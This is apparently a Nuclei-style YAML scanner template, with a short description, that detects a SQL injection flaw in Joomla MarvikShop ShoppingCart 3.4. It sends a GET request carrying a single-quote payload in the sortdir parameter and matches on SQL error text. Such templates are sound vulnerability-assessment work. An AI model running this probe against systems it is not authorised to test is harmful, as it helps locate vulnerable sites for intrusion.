Joomla MarvikShop ShoppingCart 3.4 is vulnerable to SQL injection which is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.
PoC代码[已公开]
id: joomla-marvikshop-sqli
info:
name: Joomla MarvikShop ShoppingCart 3.4 - Sql Injection
author: r3Y3r53
severity: high
description: |
Joomla MarvikShop ShoppingCart 3.4 is vulnerable to SQL injection which is a code injection technique that might destroy your database. SQL injection is one of the most common web hacking techniques. SQL injection is the placement of malicious code in SQL statements, via web page input.
reference:
- https://vulners.com/zdt/1337DAY-ID-38020
- https://cxsecurity.com/issue/WLB-2022100015
- https://extensions.joomla.org/
metadata:
verified: true
max-request: 1
tags: joomla,marvikshop,sqli,unauth,vuln
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=%27"
matchers:
- type: dsl
dsl:
- 'contains(body, "You have an error in your SQL syntax") && contains(body, "manufacturers_id") && contains(body, "products_price")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502205ac0d22053285756faa4e26fcf04ffac2ecff0b5b05fdf1770812080cf39edce022100f91ee053ee7bea2c0103c1deb98875dfe91d095b61d85896af06c175066ec073:922c64590222798bb761d5b6d8e72950